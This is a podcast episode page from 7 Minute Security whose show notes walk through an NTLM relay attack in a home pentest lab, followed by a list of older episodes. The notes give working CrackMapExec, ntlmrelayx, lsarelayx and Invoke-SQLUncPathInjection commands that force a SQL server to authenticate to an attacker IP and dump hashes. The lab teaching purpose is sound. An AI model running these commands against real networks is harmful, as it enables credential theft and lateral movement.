7MS #570: How to Build a Vulnerable Pentest Lab - Part 4
7 Minute Security5 Maj 2023

7MS #570: How to Build a Vulnerable Pentest Lab - Part 4

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

In today's episode we staged an NTLM relay attack using a vulnerable SQL server.

First we used CrackMapExec (see our two part series on Cracking and Mapping and Execing with CrackMapExec - part 1 / part 2) to find hosts with SMB signing disabled:

cme smb x.x.x.x/24 -u USER -p PASS --gen-relay-list smbsigning.txt

Then we setup lsarelayx in one window:

lsarelayx --host=localhost

And in a second window we ran ntlmrelayx.py:

python ntlmrelayx.py -smb2support --no-smb-server -t smb://VICTIM

Finally, in a third window we triggered authentication from the vulnerable SQL server:

Invoke-SQLUncPathInjection -verbose -captureip OUR.ATTACKING.IP.ADDRESS

Boom! Watch the local usernames and hashes fall out of the victim system.

We also tried doing a multirelay scenario where we had a list of victim hosts in a targets.txt file like this:

victim1 victim2 victim3

Then we tweaked the ntlmrelayx command slightly:

python ntlmrelayx.py -smb2support --no-smb-server -tf targets.txt

Interestingly(?) only victim2 was attacked.

Lastly, we ran the same attack but added the -socks option to establish SOCKS connections upon successful relay:

python ntlmrelayx.py -smb2support --no-smb-server -tf targets.txt -socks

Interestingly(?) we got a low-priv user to relay and setup a SOCKS connection, but not the domain admin configured on the SQL server.

TLDR/TLDL: relaying credentials to a single victim with ntlmrelay on a Windows hosts seems to work great! Your milage may vary if you try to pull off more advanced tricks with ntlmrelay.

Avsnitt(705)

7MS #73: PCI Pentesting 101 – Part 2 (audio)

7MS #73: PCI Pentesting 101 – Part 2 (audio)

This episode is the exciting continuation of a recent pentest I did, in which I got some serious pwnage, including cracking the domain admin password! 7MS #73: PCI Pentesting 101 – Part 2 (audio)

30 Juni 20157min

7MS #72: PCI Pentesting 101 (audio)

7MS #72: PCI Pentesting 101 (audio)

I'm pumped to talk about an about an awesome, free little tool that made my Internet connection feel like new again. 7MS #72: PCI Pentesting 101 (audio)

25 Juni 20157min

7MS #71: OFFTOPIC-Mad Max (audio)

7MS #71: OFFTOPIC-Mad Max (audio)

We're going totally off topic today and doing a movie review of Mad Max! 7MS #71: OFFTOPIC-Mad Max (audio)

23 Juni 20158min

7MS #70: Get the Most out of Your DNS! (audio)

7MS #70: Get the Most out of Your DNS! (audio)

I'm pumped to talk about an about an awesome, free little tool that made my Internet connection feel like new again. 7MS #70: Get the Most out of Your DNS! (audio)

18 Juni 20157min

7MS #69: I'm Not Responsible for Your Information Insecurity (audio)

7MS #69: I'm Not Responsible for Your Information Insecurity (audio)

Are you too hard on yourself? Do you think the success of your client's infosec program lives and dies with you? Listen to this episode. You might feel better. 7MS #69: I'm Not Responsible for Your Information Insecurity (audio)

16 Juni 20158min

7MS #68: Is Training and Awareness Worth It or Worthless (audio)

7MS #68: Is Training and Awareness Worth It or Worthless (audio)

This episode is about something that got my undies in a bunch – I heard a security expert imply that training and awareness might be worthless! 7MS #68: Is Training and Awareness Worth It or Worthless (audio)

11 Juni 20158min

7MS #67: Wifi Sniffing is Fun-Part 2 (audio)

7MS #67: Wifi Sniffing is Fun-Part 2 (audio)

This is a follow-up to episode #64, in which I did some fun wireless sniffing and tried to find sensitive data within it! In the episode I talk about the network "map" of my sniffing setup. It looks like this: Ethernet from client->upstream port of hub My laptop with Wireshark->Hub Wifi access point->Hub To find…

9 Juni 20157min

7MS #66: I'm Excited to Go Phishing – Part 2 (audio)

7MS #66: I'm Excited to Go Phishing – Part 2 (audio)

This is a follow-up to episode #63, discussing the results of a fun phishing campaign I recently completed. 7MS #66: I'm Excited to Go Phishing – Part 2 (audio)

4 Juni 20158min

Populärt inom Politik & nyheter

svenska-fall
aftonbladet-krim
motiv
p3-krim
fordomspodden
flashback-forever
rss-viva-fotboll
rss-krimstad
aftonbladet-daily
rss-sanning-konsekvens
spar
blenda-2
rss-krimreportrarna
rss-frandfors-horna
rss-vad-fan-hande
dagens-eko
olyckan-inifran
krimmagasinet
rss-flodet
spotlight